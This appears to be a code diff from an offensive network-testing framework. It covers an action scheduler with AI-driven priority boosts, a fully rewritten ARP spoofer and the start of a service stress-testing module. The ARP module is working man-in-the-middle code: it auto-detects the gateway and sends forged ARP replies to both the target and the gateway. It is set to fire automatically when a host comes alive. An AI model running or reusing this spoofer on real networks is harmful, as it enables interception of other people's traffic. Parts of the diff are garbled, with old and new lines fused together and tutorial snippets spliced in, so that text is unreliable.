available_actions=available,
exploration_rate=0.0 # No exploration in scheduler
)
if not isinstance(debug, dict):
debug = {}
threshold = self._get_ai_confirm_threshold()
if recommended_action and confidence >= threshold: # Only boost if confident
# Boost recommended action
boost_amount = int(20 * confidence) # Scale boost by confidence
affected = self.db.execute("""
UPDATE action_queue
SET priority = priority + ?
WHERE mac_address=? AND action_name=? AND status='pending'
""", (boost_amount, mac, recommended_action))
if affected and affected > 0:
# NEW: Update metadata to reflect AI influence
try:
# We fetch all matching IDs to update their metadata
rows = self.db.query("""
SELECT id, metadata FROM action_queue
WHERE mac_address=? AND action_name=? AND status='pending'
""", (mac, recommended_action))
for row in rows:
meta = json.loads(row['metadata'] or '{}')
meta['decision_method'] = f"ai_boosted ({debug.get('method', 'unknown')})"
meta['decision_origin'] = "ai_boosted"
meta['decision_scope'] = "priority_boost"
meta['ai_confidence'] = confidence
meta['ai_threshold'] = threshold
meta['ai_method'] = str(debug.get('method', 'unknown'))
meta['ai_recommended_action'] = recommended_action
meta['ai_model_loaded'] = bool(getattr(self.ai_engine, "model_loaded", False))
meta['ai_reason'] = "priority_boost_applied"
meta['ai_debug'] = debug # Includes all_scores and input_vector
self.db.execute("UPDATE action_queue SET metadata=? WHERE id=?",
(json.dumps(meta), row['id']))
except Exception as meta_e:
logger.error(f"Failed to update metadata for AI boost: {meta_e}")
logger.info(
f"[AI_BOOST] action={recommended_action} mac={mac} boost={boost_amount} "
f"conf={float(confidence):.2f} thr={float(threshold):.2f} "
f"method={debug.get('method', 'unknown')}"
)
except Exception as e:
logger.error(f"Error applying AI priority boost: {e}")
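The metadata update in the boost path is a plain read-modify-write of a JSON text column. A minimal sketch of that round-trip (reduced schema, illustrative values):

```python
import json
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE action_queue (id INTEGER PRIMARY KEY, metadata TEXT)")
conn.execute("INSERT INTO action_queue (metadata) VALUES (?)",
             ('{"interval": 300}',))

# Read the JSON column, merge new keys, write it back (as in the boost loop).
row = conn.execute("SELECT id, metadata FROM action_queue").fetchone()
meta = json.loads(row[1] or "{}")
meta["decision_origin"] = "ai_boosted"
meta["ai_confidence"] = 0.85
conn.execute("UPDATE action_queue SET metadata=? WHERE id=?",
             (json.dumps(meta), row[0]))

print(conn.execute("SELECT metadata FROM action_queue").fetchone()[0])
```

The `or "{}"` guard mirrors the production code: a NULL metadata column decodes to an empty dict instead of raising.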
def stop(self):
"""Stop the scheduler."""
logger.info("Stopping ActionScheduler...")
self.running = False
self._stop_event.set()
# --------------------------------------------------------------- definitions
def _get_ai_confirm_threshold(self) -> float:
"""Return normalized AI confirmation threshold in [0.0, 1.0]."""
try:
raw = float(getattr(self.shared_data, "ai_confirm_threshold", 0.3))
except Exception:
raw = 0.3
return max(0.0, min(1.0, raw))
def _annotate_decision_metadata(
self,
metadata: Dict[str, Any],
action_name: str,
context: Dict[str, Any],
decision_scope: str,
) -> None:
"""
Fill metadata with a consistent decision trace:
decision_method/origin + AI method/confidence/threshold/reason.
"""
metadata.setdefault("decision_method", "heuristic")
metadata.setdefault("decision_origin", "heuristic")
metadata["decision_scope"] = decision_scope
threshold = self._get_ai_confirm_threshold()
metadata["ai_threshold"] = threshold
if self.shared_data.operation_mode != "AI":
metadata["ai_reason"] = "ai_mode_disabled"
return
if not self.ai_engine:
metadata["ai_reason"] = "ai_engine_unavailable"
return
try:
recommended, confidence, debug = self.ai_engine.choose_action(
host_context=context,
available_actions=[action_name],
exploration_rate=0.0,
)
ai_method = str((debug or {}).get("method", "unknown"))
confidence_f = float(confidence or 0.0)
model_loaded = bool(getattr(self.ai_engine, "model_loaded", False))
metadata["ai_method"] = ai_method
metadata["ai_confidence"] = confidence_f
metadata["ai_recommended_action"] = recommended or ""
metadata["ai_model_loaded"] = model_loaded
if recommended == action_name and confidence_f >= threshold:
metadata["decision_method"] = f"ai_confirmed ({ai_method})"
metadata["decision_origin"] = "ai_confirmed"
metadata["ai_reason"] = "recommended_above_threshold"
elif recommended != action_name:
metadata["decision_origin"] = "heuristic"
metadata["ai_reason"] = "recommended_different_action"
else:
metadata["decision_origin"] = "heuristic"
metadata["ai_reason"] = "confidence_below_threshold"
except Exception as e:
metadata["ai_reason"] = "ai_check_failed"
logger.debug(f"AI decision annotation failed for {action_name}: {e}")
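The confirm-or-fallback rule in `_annotate_decision_metadata` boils down to a small pure function. The sketch below (names are hypothetical, not part of the codebase) makes the three outcomes explicit:

```python
def classify_decision(action_name, recommended, confidence, threshold=0.3):
    """Return (decision_origin, ai_reason) as the annotator would record them."""
    if recommended == action_name and confidence >= threshold:
        return "ai_confirmed", "recommended_above_threshold"
    if recommended != action_name:
        return "heuristic", "recommended_different_action"
    return "heuristic", "confidence_below_threshold"

print(classify_decision("NmapScan", "NmapScan", 0.8))  # AI agrees, confident
print(classify_decision("NmapScan", "ARPSpoof", 0.8))  # AI prefers another action
print(classify_decision("NmapScan", "NmapScan", 0.1))  # AI agrees, not confident
```

Note that only the first branch changes the decision origin; the other two leave the heuristic in charge and merely record why.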
def _log_queue_decision(
self,
action_name: str,
mac: str,
metadata: Dict[str, Any],
target_port: Optional[int] = None,
target_service: Optional[str] = None,
) -> None:
"""Emit a compact, explicit queue-decision log line."""
decision = str(metadata.get("decision_method", "heuristic"))
origin = str(metadata.get("decision_origin", "heuristic"))
ai_method = str(metadata.get("ai_method", "n/a"))
ai_reason = str(metadata.get("ai_reason", "n/a"))
ai_conf = metadata.get("ai_confidence")
ai_thr = metadata.get("ai_threshold")
scope = str(metadata.get("decision_scope", "unknown"))
conf_txt = f"{float(ai_conf):.2f}" if isinstance(ai_conf, (int, float)) else "n/a"
thr_txt = f"{float(ai_thr):.2f}" if isinstance(ai_thr, (int, float)) else "n/a"
model_loaded = bool(metadata.get("ai_model_loaded", False))
port_txt = "None" if target_port is None else str(target_port)
svc_txt = target_service if target_service else "None"
logger.info(
f"[QUEUE_DECISION] scope={scope} action={action_name} mac={mac} port={port_txt} service={svc_txt} "
f"decision={decision} origin={origin} ai_method={ai_method} conf={conf_txt} thr={thr_txt} "
f"model_loaded={model_loaded} reason={ai_reason}"
)
# ---------- replace this method ----------
def _refresh_cache_if_needed(self):
"""Refresh action definitions cache if expired or source flipped."""
@@ -160,6 +434,9 @@ class ActionScheduler:
# Build cache (expect same action schema: b_class, b_trigger, b_action, etc.)
self._action_definitions = {a["b_class"]: a for a in actions}
# Runtime truth: orchestrator loads from `actions`, so align b_enabled to it
# even when scheduler uses `actions_studio` as source.
self._overlay_runtime_enabled_flags()
logger.info(f"Refreshed action cache from '{source}': {len(self._action_definitions)} actions")
except AttributeError as e:
@@ -179,6 +456,67 @@ class ActionScheduler:
except Exception as e:
logger.error(f"Failed to refresh action cache: {e}")
def _is_action_enabled(self, action_def: Dict[str, Any]) -> bool:
"""Parse b_enabled robustly across int/bool/string/null values."""
raw = action_def.get("b_enabled", 1)
if raw is None:
return True
if isinstance(raw, bool):
return raw
if isinstance(raw, (int, float)):
return int(raw) == 1
s = str(raw).strip().lower()
if s in {"1", "true", "yes", "on"}:
return True
if s in {"0", "false", "no", "off"}:
return False
try:
return int(float(s)) == 1
except Exception:
# Conservative default: keep action enabled when value is malformed.
return True
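As a quick standalone check, the same parsing rules handle the mixed value types that show up in config rows; this free function mirrors the method body above:

```python
def is_enabled(raw) -> bool:
    """Parse a b_enabled-style flag across int/bool/string/null values."""
    if raw is None:
        return True
    if isinstance(raw, bool):
        return raw
    if isinstance(raw, (int, float)):
        return int(raw) == 1
    s = str(raw).strip().lower()
    if s in {"1", "true", "yes", "on"}:
        return True
    if s in {"0", "false", "no", "off"}:
        return False
    try:
        return int(float(s)) == 1
    except Exception:
        return True  # conservative default on malformed values

print([is_enabled(v) for v in (1, 0, "Yes", " off ", "1.0", None, "garbage")])
# [True, False, True, False, True, True, True]
```

The `bool` check must precede the numeric check because `isinstance(True, int)` is also true in Python.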
def _overlay_runtime_enabled_flags(self):
"""
Override cached `b_enabled` with runtime `actions` table values.
This keeps scheduler decisions aligned with orchestrator loaded actions.
"""
try:
runtime_rows = self.db.list_actions()
runtime_map = {r.get("b_class"): r.get("b_enabled", 1) for r in runtime_rows}
for action_name, action_def in self._action_definitions.items():
if action_name in runtime_map:
action_def["b_enabled"] = runtime_map[action_name]
except Exception as e:
logger.warning(f"Could not overlay runtime b_enabled flags: {e}")
def _cancel_queued_disabled_actions(self):
"""Cancel pending/scheduled queue entries for currently disabled actions."""
try:
disabled = [
name for name, definition in self._action_definitions.items()
if not self._is_action_enabled(definition)
]
if not disabled:
return
placeholders = ",".join("?" for _ in disabled)
affected = self.db.execute(
f"""
UPDATE action_queue
SET status='cancelled',
completed_at=CURRENT_TIMESTAMP,
error_message=COALESCE(error_message, 'disabled_by_config')
WHERE status IN ('scheduled','pending')
AND action_name IN ({placeholders})
""",
tuple(disabled),
)
if affected:
logger.info(f"Cancelled {affected} queued action(s) because b_enabled=0")
except Exception as e:
logger.error(f"Failed to cancel queued disabled actions: {e}")
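The dynamic `IN (...)` clause above is built by joining one `?` placeholder per value, which keeps the query fully parameterized. A minimal sqlite3 sketch of the same pattern:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE action_queue (action_name TEXT, status TEXT)")
conn.executemany("INSERT INTO action_queue VALUES (?, ?)", [
    ("NmapScan", "pending"),
    ("ARPSpoof", "scheduled"),
    ("Backup", "pending"),
])

disabled = ["NmapScan", "ARPSpoof"]
placeholders = ",".join("?" for _ in disabled)  # "?,?"
cur = conn.execute(
    f"UPDATE action_queue SET status='cancelled' "
    f"WHERE status IN ('scheduled','pending') AND action_name IN ({placeholders})",
    tuple(disabled),
)
print(cur.rowcount)  # 2
```

Only the placeholder count is interpolated into the SQL string; the values themselves still travel as bound parameters, so no escaping is needed.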
# ------------------------------------------------------------------ helpers
@@ -248,7 +586,7 @@ class ActionScheduler:
for action in self._action_definitions.values():
if (action.get("b_action") or "normal") != "global":
continue
if not self._is_action_enabled(action):
continue
trigger = (action.get("b_trigger") or "").strip()
@@ -275,7 +613,7 @@ class ActionScheduler:
for action in self._action_definitions.values():
if (action.get("b_action") or "normal") == "global":
continue
if not self._is_action_enabled(action):
continue
trigger = (action.get("b_trigger") or "").strip()
@@ -309,6 +647,19 @@ class ActionScheduler:
next_run = _utcnow() if not last else (last + timedelta(seconds=interval))
scheduled_for = _db_ts(next_run)
metadata = {
"interval": interval,
"is_global": True,
"decision_method": "heuristic",
"decision_origin": "heuristic",
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context={"mac": mac, "hostname": "Bjorn-C2", "ports": []},
decision_scope="scheduled_global",
)
inserted = self.db.ensure_scheduled_occurrence(
action_name=action_name,
next_run_at=scheduled_for,
@@ -317,7 +668,7 @@ class ActionScheduler:
priority=int(action_def.get("b_priority", 40) or 40),
trigger="scheduler",
tags=action_def.get("b_tags", []),
metadata=metadata,
max_retries=int(action_def.get("b_max_retries", 3) or 3),
)
if inserted:
@@ -354,6 +705,23 @@ class ActionScheduler:
next_run = _utcnow() if not last else (last + timedelta(seconds=interval))
scheduled_for = _db_ts(next_run)
metadata = {
"interval": interval,
"is_global": False,
"decision_method": "heuristic",
"decision_origin": "heuristic",
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context={
"mac": mac,
"hostname": (host.get("hostnames") or "").split(";")[0],
"ports": [int(p) for p in (host.get("ports") or "").split(";") if p.isdigit()],
},
decision_scope="scheduled_host",
)
inserted = self.db.ensure_scheduled_occurrence(
action_name=action_name,
next_run_at=scheduled_for,
@@ -362,7 +730,7 @@ class ActionScheduler:
priority=int(action_def.get("b_priority", 40) or 40),
trigger="scheduler",
tags=action_def.get("b_tags", []),
metadata=metadata,
max_retries=int(action_def.get("b_max_retries", 3) or 3),
)
if inserted:
@@ -382,7 +750,7 @@ class ActionScheduler:
for action in self._action_definitions.values():
if (action.get("b_action") or "normal") != "global":
continue
if not self._is_action_enabled(action):
continue
trigger = (action.get("b_trigger") or "").strip()
@@ -409,14 +777,13 @@ class ActionScheduler:
continue
# Queue the action
if self._queue_global_action(action):
self._last_global_runs[action_name] = time.time()
except Exception as e:
logger.error(f"Error evaluating global actions: {e}")
def _queue_global_action(self, action_def: Dict[str, Any]) -> bool:
"""Queue a global action for execution (idempotent insert)."""
action_name = action_def["b_class"]
mac = self.ctrl_mac
@@ -429,12 +796,30 @@ class ActionScheduler:
"requirements": action_def.get("b_requires", ""),
"timeout": timeout,
"is_global": True,
"decision_method": "heuristic",
"decision_origin": "heuristic",
} }
# Global context (controller itself)
context = {
"mac": mac,
"hostname": "Bjorn-C2",
"ports": [] # Global actions usually don't target specific ports on controller
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context=context,
decision_scope="queue_global",
)
ai_conf = metadata.get("ai_confidence")
if isinstance(ai_conf, (int, float)) and metadata.get("decision_origin") == "ai_confirmed":
action_def["b_priority"] = int(action_def.get("b_priority", 50) or 50) + int(20 * float(ai_conf))
try:
self._ensure_host_exists(mac)
# Guard with NOT EXISTS to avoid races
affected = self.db.execute(
"""
INSERT INTO action_queue (
action_name, mac_address, ip, port, hostname, service,
@@ -463,8 +848,13 @@ class ActionScheduler:
mac,
),
)
if affected and affected > 0:
self._log_queue_decision(action_name=action_name, mac=mac, metadata=metadata)
return True
return False
except Exception as e:
logger.error(f"Failed to queue global action {action_name}: {e}")
return False
# ------------------------------------------------------------- host path
@@ -480,7 +870,7 @@ class ActionScheduler:
continue
# Skip disabled actions
if not self._is_action_enabled(action_def):
continue continue
trigger = (action_def.get("b_trigger") or "").strip()
@@ -509,7 +899,6 @@ class ActionScheduler:
# Queue the action
self._queue_action(host, action_def, target_port, target_service)
def _resolve_target_port_service(
self, mac: str, host: Dict[str, Any], action_def: Dict[str, Any]
@@ -640,7 +1029,7 @@ class ActionScheduler:
def _queue_action(
self, host: Dict[str, Any], action_def: Dict[str, Any], target_port: Optional[int], target_service: Optional[str]
) -> bool:
"""Queue action for execution (idempotent insert with NOT EXISTS guard)."""
action_name = action_def["b_class"]
mac = host["mac_address"]
@@ -653,11 +1042,29 @@ class ActionScheduler:
"requirements": action_def.get("b_requires", ""),
"is_global": False,
"timeout": timeout,
"decision_method": "heuristic",
"decision_origin": "heuristic",
"ports_snapshot": host.get("ports") or "",
}
context = {
"mac": mac,
"hostname": (host.get("hostnames") or "").split(";")[0],
"ports": [int(p) for p in (host.get("ports") or "").split(";") if p.isdigit()],
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context=context,
decision_scope="queue_host",
)
ai_conf = metadata.get("ai_confidence")
if isinstance(ai_conf, (int, float)) and metadata.get("decision_origin") == "ai_confirmed":
# Apply small priority boost only when AI confirmed this exact action.
action_def["b_priority"] = int(action_def.get("b_priority", 50) or 50) + int(20 * float(ai_conf))
try:
affected = self.db.execute(
"""
INSERT INTO action_queue (
action_name, mac_address, ip, port, hostname, service,
@@ -690,8 +1097,19 @@ class ActionScheduler:
self_port,
),
)
if affected and affected > 0:
self._log_queue_decision(
action_name=action_name,
mac=mac,
metadata=metadata,
target_port=target_port,
target_service=target_service,
)
return True
return False
except Exception as e:
logger.error(f"Failed to queue {action_name} for {mac}: {e}")
return False
# ------------------------------------------------------------- last times
@@ -708,7 +1126,11 @@ class ActionScheduler:
)
if row and row[0].get("completed_at"):
try:
val = row[0]["completed_at"]
if isinstance(val, str):
return datetime.fromisoformat(val)
elif isinstance(val, datetime):
return val
except Exception:
return None
return None
@@ -726,7 +1148,11 @@ class ActionScheduler:
)
if row and row[0].get("completed_at"):
try:
val = row[0]["completed_at"]
if isinstance(val, str):
return datetime.fromisoformat(val)
elif isinstance(val, datetime):
return val
except Exception:
return None
return None
@@ -840,19 +1266,7 @@ class ActionScheduler:
except Exception as e:
logger.error(f"Failed to cleanup queue: {e}")
# update_priorities is defined above (line ~166); this duplicate is removed.
# =================================================================== helpers ==

@@ -1,163 +1,330 @@
# AARP Spoofer by poisoning the ARP cache of a target and a gateway. """
# Saves settings (target, gateway, interface, delay) in `/home/bjorn/.settings_bjorn/arpspoofer_settings.json`. arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
# Automatically loads saved settings if arguments are not provided.
# -t, --target IP address of the target device (overrides saved value). Ethical cybersecurity lab action for Bjorn framework.
# -g, --gateway IP address of the gateway (overrides saved value). Performs bidirectional ARP spoofing between a target host and the network
# -i, --interface Network interface (default: primary or saved). gateway. Restores ARP tables on completion or interruption.
# -d, --delay Delay between ARP packets in seconds (default: 2 or saved).
# - First time: python arpspoofer.py -t TARGET -g GATEWAY -i INTERFACE -d DELAY SQL mode:
# - Subsequent: python arpspoofer.py (uses saved settings). - Orchestrator provides (ip, port, row) for the target host.
# - Update: Provide any argument to override saved values. - Gateway IP is auto-detected from system routing table or shared config.
- Results persisted to JSON output and logged for RL training.
- Fully integrated with EPD display (progress, status, comments).
"""
import os import os
import json
import time import time
import argparse import logging
from scapy.all import ARP, send, sr1, conf import json
import subprocess
import datetime
from typing import Dict, Optional, Tuple
from shared import SharedData
from logger import Logger
logger = Logger(name="arp_spoofer.py", level=logging.DEBUG)
# Silence scapy warnings
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy").setLevel(logging.ERROR)
# ──────────────────────── Action Metadata ────────────────────────
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_status = "arp_spoof"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "aggressive"
b_category = "network_attack"
b_name = "ARP Spoofer"
b_description = (
"Bidirectional ARP cache poisoning between target host and gateway for "
"MITM positioning. Detects gateway automatically, spoofs both directions, "
"and cleanly restores ARP tables on completion. Educational lab use only."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "ARPSpoof.png"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 30
b_cooldown = 3600
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 2
b_risk_level = "high"
b_enabled = 1
b_tags = ["mitm", "arp", "network", "layer2"]
b_args = {
"duration": {
"type": "slider", "label": "Duration (s)",
"min": 10, "max": 300, "step": 10, "default": 60,
"help": "How long to maintain the ARP poison (seconds)."
},
"interval": {
"type": "slider", "label": "Packet interval (s)",
"min": 1, "max": 10, "step": 1, "default": 2,
"help": "Delay between ARP poison packets."
},
}
b_examples = [
{"duration": 60, "interval": 2},
{"duration": 120, "interval": 1},
]
b_docs_url = "docs/actions/ARPSpoof.md"
# ──────────────────────── Constants ──────────────────────────────
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "arp")
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_enabled = 0
# Folder and file for settings
SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(SETTINGS_DIR, "arpspoofer_settings.json")
class ARPSpoof: class ARPSpoof:
def __init__(self, target_ip, gateway_ip, interface, delay): """ARP cache poisoning action integrated with Bjorn orchestrator."""
self.target_ip = target_ip
self.gateway_ip = gateway_ip
self.interface = interface
self.delay = delay
conf.iface = self.interface # Set the interface
print(f"ARPSpoof initialized with target IP: {self.target_ip}, gateway IP: {self.gateway_ip}, interface: {self.interface}, delay: {self.delay}s")
def get_mac(self, ip): def __init__(self, shared_data: SharedData):
"""Gets the MAC address of a target IP by sending an ARP request.""" self.shared_data = shared_data
print(f"Retrieving MAC address for IP: {ip}") self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self._scapy_ok = False
self._check_scapy()
try: try:
arp_request = ARP(pdst=ip) os.makedirs(OUTPUT_DIR, exist_ok=True)
response = sr1(arp_request, timeout=2, verbose=False) except OSError:
if response: pass
print(f"MAC address found for {ip}: {response.hwsrc}") logger.info("ARPSpoof initialized")
return response.hwsrc
else: def _check_scapy(self):
print(f"No ARP response received for IP {ip}") try:
return None from scapy.all import ARP, Ether, sendp, sr1 # noqa: F401
self._scapy_ok = True
except ImportError:
logger.error("scapy not available — ARPSpoof will not function")
self._scapy_ok = False
# ─────────────────── Identity Cache ──────────────────────
def _refresh_ip_identity_cache(self):
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e: except Exception as e:
print(f"Error retrieving MAC address for {ip}: {e}") logger.error(f"DB get_all_hosts failed: {e}")
return None rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hn = (r.get("hostnames") or "").split(";", 1)[0]
for ip_addr in [p.strip() for p in (r.get("ips") or "").split(";") if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, hn)
def spoof(self, target_ip, spoof_ip): def _mac_for_ip(self, ip: str) -> Optional[str]:
"""Sends an ARP packet to spoof the target into believing the attacker's IP is the spoofed IP.""" if ip not in self._ip_to_identity:
print(f"Preparing ARP spoofing for target {target_ip}, pretending to be {spoof_ip}") self._refresh_ip_identity_cache()
target_mac = self.get_mac(target_ip) return self._ip_to_identity.get(ip, (None, None))[0]
spoof_mac = self.get_mac(spoof_ip)
if not target_mac or not spoof_mac:
print(f"Cannot find MAC address for target {target_ip} or {spoof_ip}, spoofing aborted")
return
# ─────────────────── Gateway Detection ──────────────────
def _detect_gateway(self) -> Optional[str]:
"""Auto-detect the default gateway IP."""
gw = getattr(self.shared_data, "gateway_ip", None)
if gw and gw != "0.0.0.0":
return gw
try:
result = subprocess.run(
["ip", "route", "show", "default"],
capture_output=True, text=True, timeout=5
)
if result.returncode == 0 and result.stdout.strip():
parts = result.stdout.strip().split("\n")[0].split()
idx = parts.index("via") if "via" in parts else -1
if idx >= 0 and idx + 1 < len(parts):
return parts[idx + 1]
except Exception as e:
logger.debug(f"Gateway detection via ip route failed: {e}")
try:
from scapy.all import conf as scapy_conf
gw = scapy_conf.route.route("0.0.0.0")[2]
if gw and gw != "0.0.0.0":
return gw
except Exception as e:
logger.debug(f"Gateway detection via scapy failed: {e}")
return None
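The `ip route show default` parsing above can be exercised on a canned route line; this standalone sketch mirrors the token handling (the function name and sample output line are illustrative, not part of the module):

```python
def gateway_from_route_output(stdout: str):
    """Extract the IP after 'via' from the first default-route line, if any."""
    parts = stdout.strip().split("\n")[0].split()
    idx = parts.index("via") if "via" in parts else -1
    if idx >= 0 and idx + 1 < len(parts):
        return parts[idx + 1]
    return None

# Typical dhcp default route; routes without a 'via' hop yield None
sample = "default via 192.168.1.1 dev wlan0 proto dhcp metric 600"
print(gateway_from_route_output(sample))  # → 192.168.1.1
```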
# ─────────────────── ARP Operations ──────────────────────
@staticmethod
def _get_mac_via_arp(ip: str, iface: str = None, timeout: float = 2.0) -> Optional[str]:
"""Resolve IP to MAC via ARP request."""
try:
from scapy.all import ARP, sr1
kwargs = {"timeout": timeout, "verbose": False}
if iface:
kwargs["iface"] = iface
resp = sr1(ARP(pdst=ip), **kwargs)
if resp and hasattr(resp, "hwsrc"):
return resp.hwsrc
except Exception as e:
logger.debug(f"ARP resolution failed for {ip}: {e}")
return None
@staticmethod
def _send_arp_poison(target_ip, target_mac, spoof_ip, iface=None):
"""Send a single ARP poison packet (op=is-at)."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip
)
kwargs = {"verbose": False}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP poison send failed to {target_ip}: {e}")
@staticmethod
def _send_arp_restore(target_ip, target_mac, real_ip, real_mac, iface=None):
"""Restore legitimate ARP mapping with multiple packets."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac,
psrc=real_ip, hwsrc=real_mac
)
kwargs = {"verbose": False, "count": 5}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP restore failed for {target_ip}: {e}")
# ─────────────────── Main Execute ────────────────────────
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""Execute bidirectional ARP spoofing against target host."""
self.shared_data.bjorn_orch_status = "ARPSpoof"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip}
if not self._scapy_ok:
logger.error("scapy unavailable, cannot perform ARP spoof")
return "failed"
target_mac = None
gateway_mac = None
gateway_ip = None
iface = None
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or ""
hostname = row.get("Hostname") or row.get("hostname") or ""
# 1) Detect gateway
gateway_ip = self._detect_gateway()
if not gateway_ip:
logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
return "failed"
if gateway_ip == ip:
logger.warning(f"Target {ip} IS the gateway — skipping")
return "failed"
logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")
self.shared_data.log_milestone(b_class, "GatewayID", f"Poisoning {ip} <-> {gateway_ip}")
self.shared_data.comment_params = {"ip": ip, "gateway": gateway_ip}
self.shared_data.bjorn_progress = "10%"
# 2) Resolve MACs
iface = getattr(self.shared_data, "default_network_interface", None)
target_mac = self._get_mac_via_arp(ip, iface)
gateway_mac = self._get_mac_via_arp(gateway_ip, iface)
if not target_mac:
logger.error(f"Cannot resolve MAC for target {ip}")
return "failed"
if not gateway_mac:
logger.error(f"Cannot resolve MAC for gateway {gateway_ip}")
return "failed"
self.shared_data.bjorn_progress = "20%"
logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
self.shared_data.log_milestone(b_class, "PoisonActive", f"MACs resolved, starting spoof")
# 3) Spoofing loop
duration = int(getattr(self.shared_data, "arp_spoof_duration", 60))
interval = max(1, int(getattr(self.shared_data, "arp_spoof_interval", 2)))
packets_sent = 0
start_time = time.time()
while (time.time() - start_time) < duration:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit — stopping ARP spoof")
break
self._send_arp_poison(ip, target_mac, gateway_ip, iface)
self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
packets_sent += 2
elapsed = time.time() - start_time
pct = min(90, int(20 + (elapsed / max(duration, 1)) * 70))
self.shared_data.bjorn_progress = f"{pct}%"
if packets_sent % 20 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Injected {packets_sent} poison pkts")
time.sleep(interval)
# 4) Restore ARP tables
self.shared_data.bjorn_progress = "95%"
logger.info("Restoring ARP tables...")
self.shared_data.log_milestone(b_class, "RestoreStart", f"Healing {ip} and {gateway_ip}")
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
# 5) Save results
elapsed_total = time.time() - start_time
result_data = {
"timestamp": datetime.datetime.now().isoformat(),
"target_ip": ip, "target_mac": target_mac,
"gateway_ip": gateway_ip, "gateway_mac": gateway_mac,
"duration_s": round(elapsed_total, 1),
"packets_sent": packets_sent,
"hostname": hostname, "mac_address": mac
}
try:
ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
out_file = os.path.join(OUTPUT_DIR, f"arp_spoof_{ip}_{ts}.json")
with open(out_file, "w") as f:
json.dump(result_data, f, indent=2)
except Exception as e:
logger.error(f"Failed to save results: {e}")
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Restored tables after {packets_sent} pkts")
return "success"
except Exception as e:
logger.error(f"ARPSpoof failed for {ip}: {e}")
if target_mac and gateway_mac and gateway_ip:
try:
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
logger.info("Emergency ARP restore sent after error")
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__":
shared_data = SharedData()
try:
spoofer = ARPSpoof(shared_data)
logger.info("ARPSpoof module ready.")
except Exception as e:
logger.error(f"Error: {e}")


@@ -1,315 +1,617 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).

What it does:
- Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
- Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
(scapy), HTTP probes (urllib), or mixed mode.
(scapy), HTTP probes (urllib), or mixed mode.
- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
target's response times change under light load. Max 50 req/s to stay RPi-safe.
Output is saved to data/output/stress/<ip>_<timestamp>.json
"""
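The report boils down to comparing mean connect times before and after the load phase. A minimal, self-contained sketch of that degradation metric (the function name and sample timings here are illustrative, not the module's API):

```python
import statistics

def degradation_pct(pre_samples, post_samples):
    """Percentage slowdown from pre-stress to post-stress mean (positive = slower)."""
    pre_mean = statistics.mean(pre_samples)
    post_mean = statistics.mean(post_samples)
    if pre_mean <= 0:
        return 0.0
    return round((post_mean - pre_mean) / pre_mean * 100.0, 2)

# Baseline connect times vs. post-stress connect times, in seconds:
# the mean doubled from 11 ms to 22 ms, i.e. 100% degradation.
print(degradation_pct([0.010, 0.012, 0.011], [0.020, 0.022, 0.024]))  # → 100.0
```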
import json
import logging
import os
import random
import socket
import ssl
import statistics
import time
import threading
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional, Tuple
from urllib.request import Request, urlopen
from urllib.error import URLError
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="berserker_force.py", level=logging.DEBUG)
# -------------------- Scapy (optional) ----------------------------------------
_HAS_SCAPY = False
try:
